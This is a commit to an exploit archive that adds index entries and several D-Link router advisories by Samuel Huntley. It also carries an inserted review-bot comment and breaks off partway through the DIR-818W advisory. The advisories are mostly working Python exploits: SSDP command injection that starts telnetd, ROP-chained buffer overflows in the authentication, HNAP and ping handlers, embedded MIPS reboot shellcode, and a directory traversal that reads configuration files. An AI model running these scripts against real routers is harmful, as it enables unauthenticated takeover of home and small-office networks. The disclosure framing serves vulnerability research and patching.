DB: 2015-11-17

37 new exploits
Offensive Security 2015-11-17 05:03:43 +00:00
parent 41bf68ffcd
commit ab27bce7a8
38 changed files with 3382 additions and 0 deletions


@ -34969,3 +34969,40 @@ id,file,description,date,author,platform,type,port
38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Include Vulnerability",2013-08-13,"Takeshi Terada",php,webapps,0
38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x Cross Site Scripting Vulnerability",2013-08-13,"Sajjad Pourali",asp,webapps,0
38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 'view' Parameter Local File Include Vulnerability",2013-08-15,ICheer_No0M,php,webapps,0
38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - CSRF Vulnerability",2015-11-16,hyp3rlinx,php,webapps,0
38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0
38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - .gen SEH Overwrite Buffer Overflow Exploit",2015-11-16,LiquidWorm,windows,local,0
38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - .gfb SEH Overwrite Buffer Overflow Vulnerability",2015-11-16,LiquidWorm,windows,dos,0
38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - .tpc File Handling Buffer Overflow Vulnerability",2015-11-16,LiquidWorm,windows,dos,0
38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - .tpc File Handling Buffer Overflow Vulnerability",2015-11-16,LiquidWorm,windows,dos,0
38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - .lf5 SEH Overwrite Buffer Overflow Exploit",2015-11-16,LiquidWorm,windows,local,0
38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow PoC",2015-11-16,"Nipun Jaswal",windows,dos,0
38706,platforms/multiple/webapps/38706.txt,"VLC Web Interface 2.2.1 - Metadata Title XSS Vulnerability",2015-11-16,"Andrea Sindoni",multiple,webapps,0
38707,platforms/hardware/webapps/38707.txt,"D-link Wireless Router DIR-816L CSRF Vulnerability",2015-11-16,"Bhadresh Patel",hardware,webapps,0
38708,platforms/lin_x86-64/shellcode/38708.asm,"x64 Linux egghunter in 24 bytes",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
38709,platforms/php/webapps/38709.txt,"MCImageManager Multiple Security Vulnerabilities",2013-07-16,MustLive,php,webapps,0
38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - (.pls; .m3u; .m3u8) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0
38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - (.asx) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0
38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0
38713,platforms/windows/dos/38713.txt,"Windows Kernel win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0
38714,platforms/windows/dos/38714.txt,"Windows Kernel win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0
38715,platforms/hardware/remote/38715.txt,"D-Link DIR-815_ DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900
38716,platforms/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38717,platforms/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38718,platforms/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38719,platforms/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38720,platforms/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38721,platforms/hardware/remote/38721.txt,"D-Link DIR-815 - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38722,platforms/hardware/remote/38722.txt,"D-Link DIR-645 - Multiple UPNP Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38723,platforms/hardware/remote/38723.txt,"D-Link DIR-615 - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38724,platforms/hardware/remote/38724.txt,"D-Link DIR-601 - Command Injection Vulnerability",2015-11-16,"Samuel Huntley",hardware,remote,80
38725,platforms/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80
38726,platforms/hardware/remote/38726.txt,"D-Link DGL5500 - HNAP Buffer Overflow Vulnerability",2015-11-16,"Samuel Huntley",hardware,remote,80
38727,platforms/php/webapps/38727.txt,"AlegroCart 1.2.8 - Multiple SQL Injection Vulnerabilities",2015-11-16,"Curesec Research Team",php,webapps,80
38728,platforms/php/webapps/38728.txt,"AlegroCart 1.2.8 - LFI/RFI Vulnerability",2015-11-16,"Curesec Research Team",php,webapps,80
38729,platforms/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injection Vulnerabilities",2015-11-16,"Curesec Research Team",php,webapps,80
38730,platforms/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution Vulnerability",2015-11-16,"Curesec Research Team",php,remote,80
38731,platforms/php/remote/38731.py,"XCart 5.2.6 - Code Execution Vulnerability",2015-11-16,"Curesec Research Team",php,remote,80
38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0



@ -0,0 +1,51 @@
## Advisory Information
Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
Many Dlink routers affected. Tested on DIR-815.
## Vulnerabilities Summary
DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
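Review bot: The advisory never names the firmware version that carries the fix, so the Report Timeline (lines 85-87) tells a reader that a patch exists but not whether a given DIR-815 or DIR-850L unit is already running it, and the two SAP advisory URLs cited at lines 64-65 are described as taken down, so they cannot fill that gap. A line under Advisory Information such as `Fixed in: <fixed firmware version — confirm with vendor>` would let device owners act on the release. The timeline entry `* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.` appears to conflate the finder with the vendor contact; the sibling advisories in this commit phrase it as `found by Samuel Huntley and reported to William Brown`. Since line 70 states the only prerequisite is presence on the LAN segment, a short mitigation sentence (block inbound UDP/1900 at the WAN edge and isolate guest Wi-Fi until the update is applied) would make the advisory directly usable by defenders. The same missing fixed-version line applies to the DIR-890L/R, DIR-866L, DIR-825, DIR-818W and DIR-817LW advisories added in this commit.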


@ -0,0 +1,81 @@
## Advisory Information
Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities.
Date published: July,17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley


@ -0,0 +1,109 @@
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley


@ -0,0 +1,228 @@
## Advisory Information
Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal
issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed
issues as per the email communication. The vendor had also released the information on their security advisory
pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly
accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing
this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in
authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited
by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack
directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would
require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of
authentication as low privileged user atleast to exploit directory traversal.
## Details
Buffer overflow in auth
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf
+="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in HNAP
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Directory traversal
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints the
conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l
og_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in ping
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_
ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley


@ -0,0 +1,111 @@
## Advisory Information
Title: DIR-818W Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-818W -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-818W firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
'''
2096 after id GET param, you can control the RA
'''
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #S0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="\x2A\xB1\x4D\xF0" #JUNK S3
buf+="\x2A\xB1\x4D\xF0" #JUNK S4
buf+="\x2A\xB1\x4D\xF0" #JUNK S5
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0" #JUNK S7
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="Y"*120
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
'''
548 characters after SOapaction:http://purenetworks.com/HNAP1/GetDeviceSettings/ should work, although sprintf copies twice so only 242 characters are required including /var/run and /etc/templates/hnap which is concatenated with your string to create 548 characters
'''
